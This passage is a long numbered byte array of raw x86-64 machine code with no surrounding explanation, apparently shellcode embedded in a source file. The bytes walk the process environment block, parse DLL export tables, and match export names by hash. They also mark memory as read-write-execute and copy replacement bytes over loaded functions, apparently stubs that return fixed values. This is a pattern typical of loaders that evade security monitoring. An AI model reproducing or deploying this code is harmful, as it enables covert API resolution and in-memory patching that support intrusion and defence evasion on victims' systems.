1028 0x28, 0x48, 0x8b, 0x40, 0x68, 0x8b, 0x55, 0x18, 0x89, 0xd1, 0xff, 0xd0,
1029 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
1030 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1031 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1032 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1033 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1034 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1035 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1036 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x60,
1037 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
1038 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01, 0x00,
1039 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d, 0x08,
1040 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x00,
1041 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85,
1042 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x8b,
1043 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1044 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
1045 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00, 0x48,
1046 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00,
1047 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xb4,
1048 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1049 0x9c, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48, 0x8b,
1050 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8,
1051 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40,
1052 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01, 0x00,
1053 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x62, 0x03,
1054 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x1c,
1055 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1056 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01,
1057 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01,
1058 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00, 0x00,
1059 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2,
1060 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1061 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1062 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1063 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7, 0x85,
1064 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b, 0x95,
1065 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00, 0x48,
1066 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b, 0x85,
1067 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc, 0x01,
1068 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1069 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1070 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0x60,
1071 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x60,
1072 0x48, 0x89, 0xc1, 0xe8, 0x1d, 0x09, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80,
1073 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01,
1074 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1075 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2,
1076 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1077 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00,
1078 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xce,
1079 0x08, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x3b,
1080 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xfc, 0x01, 0x00, 0x00, 0x8b,
1081 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d,
1082 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1083 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00,
1084 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1085 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48,
1086 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1087 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x0f,
1088 0x82, 0x99, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00, 0x00,
1089 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1090 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f, 0x86,
1091 0x76, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
1092 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00,
1093 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00,
1094 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
1095 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20, 0x8b,
1096 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00,
1097 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83, 0x85,
1098 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48,
1099 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1100 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b, 0x76,
1101 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1102 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc, 0x01,
1103 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x6c,
1104 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6,
1105 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1106 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc, 0x01,
1107 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70, 0x01,
1108 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1109 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1110 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0xdc,
1111 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01, 0x00,
1112 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1113 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
1114 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b, 0x85,
1115 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b, 0x85,
1116 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55, 0x20,
1117 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00,
1118 0x48, 0x83, 0xbd, 0x68, 0x01, 0x00, 0x00, 0x00, 0x74, 0x21, 0x48, 0x8b,
1119 0x85, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8d, 0x55,
1120 0xa0, 0x48, 0x8b, 0x8d, 0x68, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
1121 0x85, 0xd0, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x48, 0xc7, 0x85, 0xd0, 0x01,
1122 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00,
1123 0x00, 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd,
1124 0xd8, 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01,
1125 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8a, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85,
1126 0xd0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d,
1127 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1128 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45,
1129 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x60, 0x00, 0x00, 0x00,
1130 0x8b, 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48,
1131 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1132 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48,
1133 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31, 0x48, 0x8b, 0x45,
1134 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20, 0x48, 0x8b, 0x55,
1135 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
1136 0x4d, 0x10, 0xe8, 0x50, 0xfb, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48,
1137 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
1138 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48,
1139 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1140 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1141 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1142 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
1143 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1144 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf, 0x45, 0x18, 0x5d, 0xc3,
1145 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1146 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x30,
1147 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1148 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b,
1149 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1150 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45,
1151 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1152 0x38, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x45,
1153 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00,
1154 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1155 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xac, 0x03, 0x00,
1156 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1157 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1158 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x46, 0xff, 0xff, 0xff, 0x48,
1159 0x8d, 0x05, 0x1a, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1160 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00,
1161 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1162 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1163 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1164 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1165 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49,
1166 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1,
1167 0xe8, 0x27, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1168 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4,
1169 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1170 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xbc, 0x03, 0x00,
1171 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1172 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1173 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xca, 0xfe, 0xff, 0xff, 0x48,
1174 0x8d, 0x05, 0x9e, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1175 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x07, 0xb8, 0x00,
1176 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1177 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0,
1178 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
1179 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x37, 0x8b, 0x55,
1180 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x4d,
1181 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x79, 0x02, 0x00, 0x00, 0x48,
1182 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b,
1183 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0,
1184 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3, 0x55,
1185 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1186 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0xc7,
1187 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3,
1188 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45,
1189 0x10, 0x2b, 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1190 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0xb8, 0x00,
1191 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1192 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x99, 0xf7, 0x7d, 0x18, 0x5d, 0xc3,
1193 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10,
1194 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10,
1195 0x48, 0x81, 0xc2, 0x4c, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
1196 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8,
1197 0x01, 0x00, 0x00, 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1198 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1199 0x5c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1200 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1201 0x00, 0x00, 0xe9, 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x7f, 0xff,
1202 0xff, 0xff, 0x48, 0x8d, 0x05, 0x61, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2,
1203 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1204 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48,
1205 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d,
1206 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40,
1207 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1208 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b,
1209 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x0a, 0xff, 0xff, 0xff,
1210 0x48, 0x89, 0xc1, 0xe8, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1211 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c,
1212 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45,
1213 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1214 0x7c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1215 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1216 0x00, 0x00, 0xe9, 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xa2, 0xfe,
1217 0xff, 0xff, 0x48, 0x8d, 0x05, 0x76, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2,
1218 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1219 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10,
1220 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1221 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1222 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb,
1223 0x37, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48,
1224 0x8d, 0x15, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x00,
1225 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b,
1226 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d,
1227 0xf0, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40,
1228 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
1229 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c,
1230 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb,
1231 0x10, 0x8b, 0x45, 0x18, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10,
1232 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8d, 0x50,
1233 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0, 0x75, 0xdf, 0x48, 0x8b,
1234 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1235 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1236 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
1237 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x17, 0x48, 0x8b,
1238 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48,
1239 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0, 0x01, 0x48, 0x8b, 0x45,
1240 0x20, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0,
1241 0x75, 0xd8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
1242 0x55, 0x56, 0x53, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x20, 0x48, 0x89,
1243 0x55, 0x28, 0x4c, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48, 0x8b,
1244 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01, 0x0f,
1245 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00,
1246 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x48,
1247 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff,
1248 0xff, 0xff, 0xff, 0xeb, 0x1d, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x16,
1249 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x30,
1250 0x48, 0x85, 0xc0, 0x75, 0xb7, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e,
1251 0x5d, 0xc3, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
1252 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
